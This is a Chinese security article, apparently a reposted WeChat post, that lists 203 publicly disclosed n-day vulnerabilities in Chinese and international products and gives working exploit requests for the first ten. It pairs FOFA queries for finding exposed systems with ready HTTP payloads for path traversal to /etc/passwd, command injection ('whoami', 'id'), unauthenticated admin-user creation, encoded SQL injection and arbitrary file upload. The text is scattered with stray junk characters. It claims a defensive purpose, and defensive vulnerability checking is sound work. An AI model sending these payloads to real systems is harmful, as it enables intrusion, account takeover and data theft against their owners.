互联网公开漏洞整理202309-202406/ F! S V. V3 W- F' t( g
道一安全 2024-06-05 07:41 北京
( r' E) b. b, N% Y* c以下文章来源于网络安全新视界 ,作者网络安全新视界. B7 R* H/ x# w( M, [
! I& U% P4 w: F4 l. ~& t( y发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。5 K5 e' ^7 e2 L
1 n) i! i9 n; ~9 V9 K
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
6 G: p- w# _0 R& }1 J0 R5 z4 J
4 L- f$ ?" H ]安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
: g" h: M3 m# z* l/ H$ q9 u; [; |- j1 D# ?
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。9 B1 p' a. q& P' W$ G6 R7 c- x: K
; b E7 V$ @5 v% l) |3 _1 g
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。0 k+ X8 H1 F" T5 v4 v- M
: M: M, r6 f% f* m. M" k
, v: D3 M; Z( A. g+ T2 y6 j8 i声明; z. e' H8 y: B% b
1 B/ L$ p& `7 D7 A, }( F6 Z) w4 ]
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
. @' W2 c0 k; Z# A
8 }" t: j- m+ N6 J: d% s |" L有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
$ x+ B. O- r$ i
" a+ z+ H1 f6 v' O9 F8 W0 Y: \, |$ R2 V- c4 T7 W# ]1 f
) E! L7 P0 _/ K% x `9 @7 z目录) q% o% X u1 A5 S' T1 ~* J7 T
; ?$ a" O' ], P" Y w; c1 G$ A
01( w( ?( X( A& C, h
1 D- }1 d$ S9 k1 Q1 @( `
1. StarRocks MPP数据库未授权访问' N$ a5 `: B0 [, ^. h+ [# x( J) N
2. Casdoor系统static任意文件读取
% I5 F% n% v" R, H$ U3 G4 ~3. EasyCVR智能边缘网关 userlist 信息泄漏
. t, f' _2 i& V1 S4. EasyCVR视频管理平台存在任意用户添加! e; G- Y7 W2 s3 Y0 m# z" y
5. NUUO NVR 视频存储管理设备远程命令执行
& U% h& ?7 I: ?! D5 J3 K6. 深信服 NGAF 任意文件读取0 o2 C: r* ?/ a' l: T
7. 鸿运主动安全监控云平台任意文件下载4 Y# {, W. `% z0 J9 a
8. 斐讯 Phicomm 路由器RCE
( `; S4 _" x2 G, `3 o4 M7 x8 [9. 稻壳CMS keyword 未授权SQL注入
3 s" \) n- c; A: N6 c! C10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
4 G5 ]! x, @, m `11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
9 M$ a2 t3 B/ ?1 K5 x& O2 n, b& M12. Jorani < 1.0.2 远程命令执行
% o+ f- M1 v9 p0 U L13. 红帆iOffice ioFileDown任意文件读取
9 ?9 e& ^ O( H# h# l+ [14. 华夏ERP(jshERP)敏感信息泄露7 Q j' U8 @4 B
15. 华夏ERP getAllList信息泄露* D6 j( j: E# a. |2 T
16. 红帆HFOffice医微云SQL注入
- d& \9 B, A& n9 W) _% a' v" N17. 大华 DSS itcBulletin SQL 注入. V& e+ ~" c8 G7 C8 N
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露! [2 x+ w, s; p3 l& h0 @3 D
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入6 z: [; {. A; P/ E2 M% d! @
20. 大华ICC智能物联综合管理平台任意文件读取
9 V Q: [2 w! U$ ?21. 大华ICC智能物联综合管理平台random远程代码执行" P" W4 }9 K$ A# j8 m- ?
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& B4 A5 V* ]; d, X, Y23. 大华ICC智能物联综合管理平台 fastjson远程代码执行- {6 I! U) C# ?/ U0 ?8 g E, r
24. 用友NC 6.5 accept.jsp任意文件上传& _1 x& O) Q3 F6 |0 e3 \+ W- l' {- w
25. 用友NC registerServlet JNDI 远程代码执行3 O8 n' D; y% ^- B% h
26. 用友NC linkVoucher SQL注入% R9 G- W+ y1 B+ [2 A
27. 用友 NC showcontent SQL注入
3 m7 M4 Q* [6 E28. 用友NC grouptemplet 任意文件上传
( ]8 |% a6 o; L/ {' O, S0 E1 i29. 用友NC down/bill SQL注入
+ @7 |/ }& K$ W; k2 z; {( S30. 用友NC importPml SQL注入
6 T6 X% t* r) ^- D% l# J, k4 m8 \31. 用友NC runStateServlet SQL注入
! W$ D% H3 m9 z: R/ F* Z8 k32. 用友NC complainbilldetail SQL注入 ?7 {# r3 {: m
33. 用友NC downTax/download SQL注入
/ U: i, d( C( w! `% g34. 用友NC warningDetailInfo接口SQL注入; c9 v( P& ?1 O [) a) S' b
35. 用友NC-Cloud importhttpscer任意文件上传
7 d) ^2 ?/ e4 |% h% a3 I7 F" `; z( f2 R" e36. 用友NC-Cloud soapFormat XXE
" m2 W1 t) }% ^' x4 G8 i- }37. 用友NC-Cloud IUpdateService XXE% ^" t0 C* d, _! q Q5 q& J
38. 用友U8 Cloud smartweb2.RPC.d XXE
8 w8 t& f* f, c& s6 x- ^39. 用友U8 Cloud RegisterServlet SQL注入% x' \8 |4 T! V- E9 m: X h5 l* X: J0 G
40. 用友U8-Cloud XChangeServlet XXE
' G, ]4 {$ ?+ q0 t2 ~" ^41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 r3 ^* d* b5 B42. 用友GRP-U8 SmartUpload01 文件上传+ h" P# b: ~5 e+ W# h4 r' r7 g# F
43. 用友GRP-U8 userInfoWeb SQL注入致RCE/ I+ t! a' g, V. t
44. 用友GRP-U8 bx_dj_check.jsp SQL注入7 G% U) _! w4 F4 h) K
45. 用友GRP-U8 ufgovbank XXE# \: q7 u' X! A! C! M: K! ^8 s- H
46. 用友GRP-U8 sqcxIndex.jsp SQL注入( q7 ?/ _6 K* V% V3 _1 |
47. 用友GRP A++Cloud 政府财务云 任意文件读取
+ f) K' o3 T# B' F( f) x$ }- }8 [+ |' F48. 用友U8 CRM swfupload 任意文件上传9 I- V2 b( G$ ~' d( Z4 s, T) [3 N
49. 用友U8 CRM系统uploadfile.php接口任意文件上传+ ]3 g6 V: n. m/ x( N z) Z" a
50. QDocs Smart School 6.4.1 filterRecords SQL注入
8 N O5 j, T- ] `1 d0 r! x51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入+ x. j0 I3 i5 ]0 o2 U7 g" @
52. 泛微E-Office json_common.php sql注入
1 I3 ~& b' \# e% p0 [; N% h53. 迪普 DPTech VPN Service 任意文件上传
9 C4 S. t% k$ `. y+ k9 ]54. 畅捷通T+ getstorewarehousebystore 远程代码执行, S# U. C: t/ t2 J; B
55. 畅捷通T+ getdecallusers信息泄露
$ T% N2 v) f0 b8 f6 e8 L56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
t( C( \0 D) q/ k+ {; B57. 畅捷通T+ keyEdit.aspx SQL注入$ i( z n5 M2 d5 C; F8 [1 D# m
58. 畅捷通T+ KeyInfoList.aspx sql注入
! f9 r( q; M. j7 @, v3 I59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行 Q. Y, o$ ^ \0 X: B
60. 百卓Smart管理平台 importexport.php SQL注入( i2 j4 {2 ^/ a$ ^0 r
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传 W+ z6 ^0 S+ _5 J4 b# H' S
62. IP-guard WebServer 远程命令执行+ x7 N4 ~4 Q0 P, a
63. IP-guard WebServer任意文件读取# F. ?2 @5 t# w" h
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
5 B, L# C6 Y7 s, k- a5 z: F65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过' y3 Y9 H+ I# A7 t2 ^; j4 L+ M- b
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入+ a; }! P! T) ~* a4 [/ K; L, |2 D
67. 万户ezOFFICE wpsservlet任意文件上传
* O( v! q* B, O$ ]) ]7 h68. 万户ezOFFICE wf_printnum.jsp SQL注入
) \: c* ~1 _) h3 d69. 万户 ezOFFICE contract_gd.jsp SQL注入
$ c2 r! X% I( K$ ?4 p70. 万户ezEIP success 命令执行
\0 K; g! w% E7 e71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入9 z( @ y/ i8 ^) a9 P- z' ~' z+ S9 p
72. 致远OA getAjaxDataServlet XXE5 M$ @5 e) i2 f* f* ~0 B# S
73. GeoServer wms远程代码执行
/ q( ~ t, Z) {" ^: e$ A' @ v74. 致远M3-server 6_1sp1 反序列化RCE" T! J7 {& i' s7 d! ^
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
( V) \5 ?( S6 [, Q! o' i76. 新开普掌上校园服务管理平台service.action远程命令执行
2 X; o5 m! ?9 i {5 y77. F22服装管理软件系统UploadHandler.ashx任意文件上传
4 R. j; @. a( { k% T( O1 a78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传7 x+ u8 T9 X5 o
79. BYTEVALUE 百为流控路由器远程命令执行
% d9 \' f& D3 c g80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传& K/ ?/ k, t# u3 b7 K2 T7 {
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露4 _# m4 I% V/ c! Q, S+ g
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
6 m9 O: `+ O2 R6 f83. JeecgBoot testConnection 远程命令执行
) k' |# `7 ~$ g' c" c" V* _6 D84. Jeecg-Boot JimuReport queryFieldBySql 模板注入- L u$ ]. q, V' G; W6 v
85. SysAid On-premise< 23.3.36远程代码执行# l! B( Y; z' ?: Q4 d7 o @
86. 日本tosei自助洗衣机RCE
1 Q5 l: G: x4 v( b$ U' R87. 安恒明御安全网关aaa_local_web_preview文件上传* R& i. d. C. b) W; T6 c
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行" U# M0 D: Y7 |
89. 致远互联FE协作办公平台editflow_manager存在sql注入
1 Z B+ t; l* ]" {- g7 F# p" \90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行& M' x+ V) h4 S& ?# K/ n/ c5 G
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取# } m5 N) r. D
92. 海康威视运行管理中心session命令执行3 L. @2 [% `' n% m( ]% v
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
+ [5 `0 F$ N- ^5 o94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
% W: T5 t! t4 K3 W9 X. Y) {+ X95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行: g& o4 N6 V& b# w
96. Apache OFBiz 18.12.11 groovy 远程代码执行' \( V5 d5 N0 P. E, \# m
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
1 l& n3 X+ i1 x* m; S. s( G7 `4 u98. SpiderFlow爬虫平台远程命令执行
# |$ j. l0 ~, ]99. Ncast盈可视高清智能录播系统busiFacade RCE
5 t- [, D) v: I: z8 J100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传1 Y/ U# e }3 I
101. ivanti policy secure-22.6命令注入
$ S# U8 A" Q7 A4 _. d1 k2 ^6 s i102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
3 @: p+ @; F% g) F103. Ivanti Pulse Connect Secure VPN XXE
6 k. I5 e+ d/ p104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
0 i: }& [( q. U; L( K: I) u105. SpringBlade v3.2.0 export-user SQL 注入6 E) g G, \: U) ]
106. SpringBlade dict-biz/list SQL 注入
?! c- L- z7 r; O: r107. SpringBlade tenant/list SQL 注入
+ u% c# {1 N6 P" W# T- _" d6 b; u108. D-Tale 3.9.0 SSRF- g& D5 M/ z/ J! z4 z
109. Jenkins CLI 任意文件读取1 q+ v# ^3 U- y% |
110. Goanywhere MFT 未授权创建管理员
$ S) I& {# v2 {' E9 E111. WordPress Plugin HTML5 Video Player SQL注入
- N* ^' W, ^; m* r; n* h6 Z- ~112. WordPress Plugin NotificationX SQL 注入
1 y) `: ?4 V( d0 k; T) l: o( K113. WordPress Automatic 插件任意文件下载和SSRF- J0 {5 n6 w7 a$ J5 x) ]( C
114. WordPress MasterStudy LMS插件 SQL注入
2 k6 w% L" I+ @# u. C6 K115. WordPress Bricks Builder <= 1.9.6 RCE% \, W$ A- N- T
116. wordpress js-support-ticket文件上传3 ^, A# C) l) S5 u; `# W: ]
117. WordPress LayerSlider插件SQL注入
9 X% R0 [$ S" Q; Y: U3 \( L, D118. 北京百绰智能S210管理平台uploadfile.php任意文件上传: Q+ G4 @) m( m% w
119. 北京百绰智能S20后台sysmanageajax.php sql注入
; N; I# j7 |4 U$ e9 Y120. 北京百绰智能S40管理平台导入web.php任意文件上传! a, k/ @5 E# `( o) ?* |, y
121. 北京百绰智能S42管理平台userattestation.php任意文件上传" @' _0 @: L! L) M* R
122. 北京百绰智能s200管理平台/importexport.php sql注入+ h3 |$ L N; J4 I
123. Atlassian Confluence 模板注入代码执行7 B0 m P8 d9 N3 p; d3 |
124. 湖南建研工程质量检测系统任意文件上传
0 O4 H8 \3 L9 K: L1 q, |* S125. ConnectWise ScreenConnect身份验证绕过, ?/ v! h3 G$ z: f/ o# E; ~# C% m; S
126. Aiohttp 路径遍历8 y. a0 ]. U `
127. 广联达Linkworks DataExchange.ashx XXE
# S! ` U6 D( J8 {128. Adobe ColdFusion 反序列化
! z& W7 m& |; j# J! w1 z8 p129. Adobe ColdFusion 任意文件读取
) n& r6 v o0 D9 f130. Laykefu客服系统任意文件上传" a$ Y! l y& ^3 X: O
131. Mini-Tmall <=20231017 SQL注入
+ u% H. |+ `: T" I w132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过9 t7 n* d" s% [% B$ c F
133. H5 云商城 file.php 文件上传
' o) z- u$ h+ C0 s134. 网康NS-ASG应用安全网关index.php sql注入
) F- ~# g* h5 q# N135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* p9 `" C4 k) `6 w, F& w% t# K# n
136. NextChat cors SSRF9 c$ J9 v: ~( F+ v% I# t! l9 b
137. 福建科立迅通信指挥调度平台down_file.php sql注入
4 C5 J9 }1 K w# U& p138. 福建科立讯通信指挥调度平台pwd_update.php sql注入. N q1 k) @5 D h4 U! l3 U
139. 福建科立讯通信指挥调度平台editemedia.php sql注入8 c! G. L+ [3 y0 W5 v% p0 i" G
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入& ^* B2 G' [# A
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入; }- a: W/ w( x! ^2 g& W, [
142. CMSV6车辆监控平台系统中存在弱密码5 K G! k. j# ^. K& K# u# J
143. Netis WF2780 v2.1.40144 远程命令执行8 t" `: U: f- l+ M+ ]2 E C% [: G0 \7 P
144. D-Link nas_sharing.cgi 命令注入
2 h o7 Z; }5 y3 b P$ T# [145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
, v1 A+ v4 o4 M0 Y9 F; m: r/ q146. MajorDoMo thumb.php 未授权远程代码执行
+ E: E9 K) X v( A; Q2 C& D147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
7 R8 c; h7 x. S& D0 e148. CrushFTP 认证绕过模板注入% K, u; j* y9 x4 a- U
149. AJ-Report开源数据大屏存在远程命令执行
+ X: _4 n) X' ^# O150. AJ-Report 1.4.0 认证绕过与远程代码执行
; A7 A& h4 w# b4 I151. AJ-Report 1.4.1 pageList sql注入
! p) j \1 z3 r/ Y( ^( H152. Progress Kemp LoadMaster 远程命令执行# \* J; M+ O1 @; p* y, U! }* k
153. gradio任意文件读取8 {1 @' p: S; ~) T
154. 天维尔消防救援作战调度平台 SQL注入
& g. D6 w' h) G4 F155. 六零导航页 file.php 任意文件上传; Y! t3 l2 @# \ J
156. TBK DVR-4104/DVR-4216 操作系统命令注入
2 B F" C) D' C( L. V157. 美特CRM upload.jsp 任意文件上传0 L" I$ d4 C+ ]3 }2 W- n2 M9 ?2 N& Z
158. Mura-CMS-processAsyncObject存在SQL注入( _# o! [- ~ p! S* K" s
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传/ l; @5 c" i) w
160. Sonatype Nexus Repository 3目录遍历与文件读取" n. x7 ~) n* K
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
W. c) v: C) r162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传3 F& A( |9 V3 W3 e& r
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传# @$ m/ f$ F* @
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传- Q1 D0 V& [0 J3 V" t0 L( H
165. OrangeHRM 3.3.3 SQL 注入
# ^* v: Y7 J0 O1 [1 i+ u* I166. 中成科信票务管理平台SeatMapHandler SQL注入
1 D9 ?2 S. n$ c& S0 ] W& F& d167. 精益价值管理系统 DownLoad.aspx任意文件读取9 Y# n, y0 U, y/ c- \
168. 宏景EHR OutputCode 任意文件读取3 @8 k: w7 r6 c! K0 Y' H
169. 宏景EHR downlawbase SQL注入3 \" n+ k3 T/ e) n) X5 Y* O, m, i
170. 宏景EHR DisplayExcelCustomReport 任意文件读取8 Q* [ l$ b- m. O& ?
171. 通天星CMSV6车载定位监控平台 SQL注入
q/ s+ O* b- }: j172. DT-高清车牌识别摄像机任意文件读取
% j; ?7 Q0 v$ R/ v! S173. Check Point 安全网关任意文件读取2 I" E& G! S8 n
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
+ z1 ^) f# Y( d: k) w) T' [175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入) X' }; `% V& J; r
176. 电信网关配置管理系统 rewrite.php 文件上传2 U$ G1 F' Q& F6 I* X) J+ b' B
177. H3C路由器敏感信息泄露* H+ j2 Z3 m, r( X4 f" w( m
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
' h6 T+ V7 k6 ^. U179. 建文工程管理系统存在任意文件读取
: O4 g3 N) T* d1 i. p; f& D180. 帮管客 CRM jiliyu SQL注入
7 I$ M& \% ~7 V! A8 @181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入7 A6 @. Q9 T8 A2 x$ p
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
/ C+ H, Y& b' q' ]% S183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入/ ~% L! v8 z' Z. ~" G8 \8 a, d, d
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
0 Q/ B" n9 R' M$ l8 B0 K185. 瑞友天翼应用虚拟化系统SQL注入; p8 ?. B7 y7 \9 z( A5 B& t' g* }
186. F-logic DataCube3 SQL注入
5 Y: D0 B4 ^1 H187. Mura CMS processAsyncObject SQL注入( A# g. w) }8 A8 Y3 p \+ R
188. 叁体-佳会视频会议 attachment 任意文件读取9 N2 Y8 X( N0 _$ U
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
1 g h. ^' X1 d8 P- i190. 短视频矩阵营销系统 poihuoqu 任意文件读取 r. ?% ]) c o- u
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入& y! M# ^: X$ ~6 c% `" F W* A X
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
% O! F0 ~$ Y, V( z; [$ k5 E7 m193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
& |$ l+ T# Z( q" j# ]194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传. b7 I. X, _7 a; }! n; t/ o4 s
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
1 z8 U8 ~& X! O, y/ c# n6 M6 O196. 河南省风速科技统一认证平台密码重置
, u2 c8 b9 g+ D$ Z197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入* E% c2 D; T; z( b6 L
198. 阿里云盘 WebDAV 命令注入 z0 F# e3 f/ H7 h3 P6 H2 a$ n
199. cockpit系统assetsmanager_upload接口 文件上传
. r N; u8 M3 s' i$ W9 ]# F; i200. SeaCMS海洋影视管理系统dmku SQL注入
+ s9 i4 d9 F* ]# h6 V201. 方正全媒体新闻采编系统 binary SQL注入
, F5 N$ J& `1 i! a( N/ ?202. 微擎系统 AccountEdit任意文件上传: p2 r8 u+ ]* g& b( c% [
203. 红海云EHR PtFjk 文件上传1 z4 ^7 j' d* Z) T, X: k3 z( G
! A4 \9 R! Y" e4 L7 L8 d8 m- x3 w) I
POC列表+ O" S; p4 a' [" W. j' i1 {
0 l* v& I' l d' o- B. N02
0 t. ? N0 J8 @$ E$ M# u; [6 }( R- v l/ E ?4 @+ o# \' w
1. StarRocks MPP数据库未授权访问9 B1 a/ y! V& P H+ g/ M
FOFA :title="StarRocks"
# y0 d2 z: ?' bGET /mem_tracker HTTP/1.16 u+ h# D) {0 h$ v# o% l0 V
Host: URL5 z$ R- w, R5 \
$ Y+ I9 Z# L' ^! Y6 [! ^
' G% `; ] l' y9 G
2. Casdoor系统static任意文件读取
; U9 f. t/ H" Q; a% P: v9 RFOFA :title="Casdoor"
3 W/ x; S7 Q4 u/ N$ S' \GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1, B' I' s) X' @
Host: xx.xx.xx.xx:9999" P, w/ {, k2 t" N3 P5 r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- e( N* y* P; J& Q1 U& P/ z2 q
Connection: close
0 S; ~/ V7 |) F& j/ G- p1 P7 vAccept: */*
' U' g M+ v5 W @' J/ X- VAccept-Language: en% ^, i: s7 v0 m
Accept-Encoding: gzip5 N8 S# _9 d" { _
4 G# U, J0 L& n# N" r* Q4 B
9 m* C7 \) r" S$ U2 C2 [
3. EasyCVR智能边缘网关 userlist 信息泄漏
& D% H& T/ H+ O+ V& jFOFA :title="EasyCVR"4 e# x! M8 I: s4 X8 x; K+ b
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
8 m) c& i! r9 R; ]! F1 ]; WHost: xx.xx.xx.xx
2 F* s" y" k8 \# p
) p" b. p0 s7 P
: z' g! f9 \, E3 h" L0 I3 j4. EasyCVR视频管理平台存在任意用户添加
6 F9 }, W* |9 y6 B. p0 a" }, GFOFA :title="EasyCVR"
1 |" ~) X! `4 q- v
( L) b# ^7 T1 r9 [) G% F9 vpassword更改为自己的密码md5
" ?! d" s5 A1 }3 _/ b/ k8 ?0 IPOST /api/v1/adduser HTTP/1.1, j' C. j0 r% c( z8 e
Host: your-ip
+ k& _/ i; S9 h% f: YContent-Type: application/x-www-form-urlencoded; charset=UTF-8
+ ]2 Y, E6 J M% U9 S. s8 H' V: q. a
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
1 b. g: t3 b; N/ F4 @. a# s% f+ [0 m" S! L. J
& u4 ]. q& \1 n. U/ X7 k" v5. NUUO NVR 视频存储管理设备远程命令执行
' O. ~1 ]5 [+ _. u x% c7 [FOFA:title="Network Video Recorder Login"
- T% |& L1 i# c+ ]( w% f jGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
+ |! M5 h( g# T) _* h( f3 Q- }Host: xx.xx.xx.xx
2 r4 v: N9 ~, U1 O3 D% [" z) [0 q) r( g0 F$ }+ y
/ C1 U; P9 N( k6. 深信服 NGAF 任意文件读取0 A% F. ]8 F" M' y/ |: o
FOFA:title="SANGFOR | NGAF"
8 D6 ?. Y2 w9 f1 OGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
' O( [5 Z0 m8 PHost:
: C! h: A( B0 K1 _ C% K' i- }; h* W' ?$ {5 D
0 N5 N0 G! d6 k3 m7 z4 \# e% Z7. 鸿运主动安全监控云平台任意文件下载% M5 G3 m: q& G# W4 M
FOFA:body="./open/webApi.html"
9 }2 _' Z. M4 U1 {GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1" ~* }" D3 ], n
Host:
9 m+ C3 C$ f2 e3 Z9 O: B/ g* E% U# @! W9 o# F
1 I/ c, f' C- [. c8. 斐讯 Phicomm 路由器RCE( M3 Z8 n- B0 c. y% f( M
FOFA:icon_hash="-1344736688"
" o' o6 S0 b B) d默认账号admin登录后台后,执行操作
7 @: V3 W0 a3 b: t/ V0 Q" \POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
+ C" {+ V( S, _ w" m) {Host: x.x.x.x
8 f2 E7 }" R$ s$ ^% bCookie: sysauth=第一步登录获取的cookie
$ h/ X7 M) f' `0 u9 y$ QContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
0 \9 o( N5 y7 C0 C: J u- fUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
4 p' L2 X$ {9 i/ G/ m8 Y
+ }. ^8 e# y$ }: u$ c7 t------WebKitFormBoundaryxbgjoytz, }# h a3 [( [3 C, n
Content-Disposition: form-data; name="wifiRebootEnablestatus"4 j, U' q4 y( U- j& J
5 b2 f0 {0 h+ S6 k%s
; Q) e7 L4 g" Y------WebKitFormBoundaryxbgjoytz3 l- \; D3 O: y3 t# d
Content-Disposition: form-data; name="wifiRebootrange". Z* [* U8 I; k4 S, }: k: u1 P0 ?' \
s: P$ B% ?( d" @# C- n12:00; id;) W# R! k5 J: h- ?3 W& M
------WebKitFormBoundaryxbgjoytz% z- k; r7 `+ C6 Q7 v, A. x2 i
Content-Disposition: form-data; name="wifiRebootendrange". D/ ]3 P5 O' u5 @; C! n
( k, S( c- [0 ~4 h( }% U! f, h+ h2 q%s:
; b: ^0 }. D* R0 H7 ^------WebKitFormBoundaryxbgjoytz
/ F- [* C) v- \1 s: S" v9 ^Content-Disposition: form-data; name="cururl2"+ v+ {9 X$ A3 G
9 h7 Z/ n/ u4 o0 n! a8 n; J) f
+ A" D7 l r4 K------WebKitFormBoundaryxbgjoytz--2 s6 v4 V7 c, x7 [2 T, }' H- O
; Y" e H7 E7 s4 z: ^! d: f" v( }
1 S4 W f* X- \) Z! c/ U! S, {+ s; I9. 稻壳CMS keyword 未授权SQL注入& R6 C; L1 S/ i, \3 }1 R
FOFA:app="Doccms"
4 r# x6 C& G l# sGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.15 W* C4 _" U h# ?0 H
Host: x.x.x.x( y ^ d4 I9 K' |( o& [
2 ~7 }* E: Y* B! t+ y3 }$ q4 I% M& o$ L3 z( K6 j \3 c& ]. m$ w1 ?4 v
payload为下列语句的二次Url编码/ i" x: y, e2 _! O
) c. B! T* u+ M; p8 z+ h+ a0 K
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#+ e$ p T7 `- W+ `5 W: k* v
g) g& t8 I! ` W, h6 G4 t10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
7 M& u* j7 s: VFOFA:icon_hash="953405444"
( v7 G) `. e) v7 ~: B3 e
' h5 b6 Z( P' V: v% f文件上传后响应中包含上传文件的路径
" y; X' m5 \4 N- k. k6 o3 oPOST /eis/service/api.aspx?action=saveImg HTTP/1.10 z3 n1 d1 H/ w' F& }
Host: x.x.x.x:xx
: M8 I) |- ~, `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
* s/ w& I7 C% d8 u! \, B% ?Content-Length: 197
/ L5 X8 L$ ?# d* H4 B4 S) BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6 L: q2 t' S* o1 @2 N! I( {& y# [+ wAccept-Encoding: gzip, deflate+ I9 l( d! q& L: G1 p. u
Accept-Language: zh-CN,zh;q=0.9/ U" U$ s4 A. `* j3 [- ]
Connection: close
, j8 p1 r8 s' ?" w* @0 sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
7 V, d8 ? c) Q
/ s3 i+ w! c, ]6 S$ d/ E------WebKitFormBoundaryxdgaqmqu
; b' s/ S% y( `& ]& sContent-Disposition: form-data; name="file"filename="icfitnya.txt"- }$ L7 N0 l9 h) v6 h
Content-Type: text/html
, K7 H0 k8 P, O1 j/ H+ o2 O' Y9 r: ~# s4 Z2 [' j
jmnqjfdsupxgfidopeixbgsxbf* I p4 N# M0 ~+ s8 I
------WebKitFormBoundaryxdgaqmqu--" K9 K8 r1 Z- S+ k w
# c+ ~6 T$ P: h) O' d! u% x) Y0 n6 G1 @. u3 U6 F# v( `0 K. ]- d
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
